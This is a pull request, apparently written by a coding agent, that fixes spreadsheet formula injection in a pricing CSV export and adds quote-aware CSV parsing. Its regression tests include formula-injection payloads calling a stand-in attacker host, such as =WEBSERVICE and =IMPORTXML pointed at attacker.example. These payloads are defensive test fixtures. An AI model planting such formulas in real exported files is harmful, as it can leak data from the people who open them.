### PR TITLE
fix: neutralize pricing CSV spreadsheet formulas on export

### DIFF
--- a/analysis/costEstimate.mjs
+++ b/analysis/costEstimate.mjs
@@ -261,6 +261,43 @@ export function summarizeCosts(lineItems = []) {
  * @param {string} csvText  Raw CSV text
  * @returns {{ prices: Object, meta: { source: string, date: string, rowCount: number, warnings: string[] } }}
  */
+function parseCSVLine(line) {
+  const fields = [];
+  let current = '';
+  let inQuotes = false;
+
+  for (let i = 0; i < line.length; i++) {
+    const ch = line[i];
+    if (ch === '"') {
+      if (inQuotes && line[i + 1] === '"') {
+        current += '"';
+        i++;
+      } else {
+        inQuotes = !inQuotes;
+      }
+    } else if (ch === ',' && !inQuotes) {
+      fields.push(current.trim());
+      current = '';
+    } else {
+      current += ch;
+    }
+  }
+
+  fields.push(current.trim());
+  return fields;
+}
+
+function sanitizeSpreadsheetCell(value) {
+  const text = String(value ?? '');
+  if (!text) return '';
+  return /^[=+\-@\t\r]/.test(text) ? `'${text}` : text;
+}
+
+function encodeCSVCell(value) {
+  const text = sanitizeSpreadsheetCell(value);
+  return /[",\n\r]/.test(text) ? `"${text.replace(/"/g, '""')}"` : text;
+}
+
 export function parsePricingCSV(csvText) {
   const prices = {};
   const warnings = [];
@@ -282,7 +319,7 @@ export function parsePricingCSV(csvText) {
 
     // Parse header row
     if (!headerParsed) {
-      const cols = raw.split(',').map(c => c.trim().toLowerCase());
+      const cols = parseCSVLine(raw).map(c => c.toLowerCase());
       if (cols.includes('category') && cols.includes('unit_price')) {
         colIndex = {
           category: cols.indexOf('category'),
@@ -300,7 +337,7 @@ export function parsePricingCSV(csvText) {
       continue;
     }
 
-    const fields = raw.split(',');
+    const fields = parseCSVLine(raw);
     const get = idx => (idx >= 0 && idx < fields.length ? fields[idx].trim() : '');
 
     const category = get(colIndex.category).toLowerCase();
@@ -371,8 +408,8 @@ export function parsePricingCSV(csvText) {
  * @returns {string} CSV text
  */
 export function exportPricingCSV(prices = {}, meta = {}) {
-  const source = meta.source || '';
-  const date   = meta.date   || new Date().toISOString().slice(0, 10);
+  const source = sanitizeSpreadsheetCell(meta.source || '');
+  const date   = sanitizeSpreadsheetCell(meta.date || new Date().toISOString().slice(0, 10));
   const rows   = [];
 
   rows.push('# CableTrayRoute Pricing Book');
@@ -385,7 +422,7 @@ export function exportPricingCSV(prices = {}, meta = {}) {
     if (!map || typeof map !== 'object') return;
     Object.entries(map).forEach(([key, price]) => {
       if (Number.isFinite(price)) {
-        rows.push(`${category},${key},${price},${unit},${source},${date}`);
+        rows.push([category, key, price, unit, source, date].map(encodeCSVCell).join(','));
       }
     });
   }
@@ -395,7 +432,7 @@ export function exportPricingCSV(prices = {}, meta = {}) {
   addRows('conduit', prices.conduit, '$/ft');
 
   if (Number.isFinite(prices.fitting)) {
-    rows.push(`fitting,,${prices.fitting},$,${source},${date}`);
+    rows.push(['fitting', '', prices.fitting, '$', source, date].map(encodeCSVCell).join(','));
   }
 
   addRows('labor',        prices.labor,            '$/hr');

--- a/tests/costEstimate.test.mjs
+++ b/tests/costEstimate.test.mjs
@@ -369,4 +369,24 @@ describe('exportPricingCSV — roundtrip', () => {
       assert.strictEqual(prices.cable[k], v, `Mismatch for cable key "${k}"`);
     });
   });
+
+  it('neutralizes spreadsheet formulas in exported string fields', () => {
+    const csv = exportPricingCSV(
+      { cable: { '=WEBSERVICE("https://attacker.example")': 1.2 } },
+      { source: '=IMPORTXML("https://attacker.example","//a")', date: '@SUM(1+1)' }
+    );
+    assert.ok(csv.includes('\'=WEBSERVICE("https://attacker.example")'));
+    assert.ok(csv.includes('\'=IMPORTXML("https://attacker.example","//a")'));
+    assert.ok(csv.includes('\'@SUM(1+1)'));
+  });
+
+  it('quotes CSV fields that contain commas', () => {
+    const csv = exportPricingCSV(
+      { cable: { '4 AWG, special': 1.25 } },
+      { source: 'Distributor, Inc.', date: '2026-04-11' }
+    );
+    const { prices, meta } = parsePricingCSV(csv);
+    assert.strictEqual(prices.cable['4 AWG, special'], 1.25);
+    assert.strictEqual(meta.source, 'Distributor, Inc.');
+  });
 });


### PR DESCRIPTION
### Motivation
- Prevent spreadsheet formula injection when exporting the pricing book by neutralizing attacker-controlled CSV fields that could be interpreted as formulas in spreadsheet applications.
- Ensure exported CSV is RFC4180-safe so keys and metadata containing commas or quotes round-trip through import/export correctly.

### Description
- Added a small CSV helper set in `analysis/costEstimate.mjs`: `parseCSVLine`, `sanitizeSpreadsheetCell`, and `encodeCSVCell` to parse quoted lines, neutralize formula-leading characters, and RFC4180-quote/escape fields.
- Updated `parsePricingCSV` to use `parseCSVLine` for robust header and data parsing and preserved existing validation/warning behavior.
- Updated `exportPricingCSV` to sanitize `meta.source`/`meta.date` and to serialize each row using `encodeCSVCell` so exported `key`/`source`/`date` fields are quoted/escaped and prefixed with `'` when they begin with `=`, `+`, `-`, `@`, tab, or carriage return.
- Added regression tests in `tests/costEstimate.test.mjs` that assert spreadsheet-formula neutralization and correct quoting/round-trip behavior for comma-containing fields.

### Testing
- Ran the full automated test suite with `npm test`, which completed successfully and included the new `tests/costEstimate.test.mjs` assertions.
- Built the distribution with `npm run build`, which completed successfully.
- Attempted a Playwright screenshot to produce a preview image, but the environment lacked browser binaries so the screenshot command failed (Playwright reported missing browser install).

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_6a091d2e257883249e9fde362079a5c8)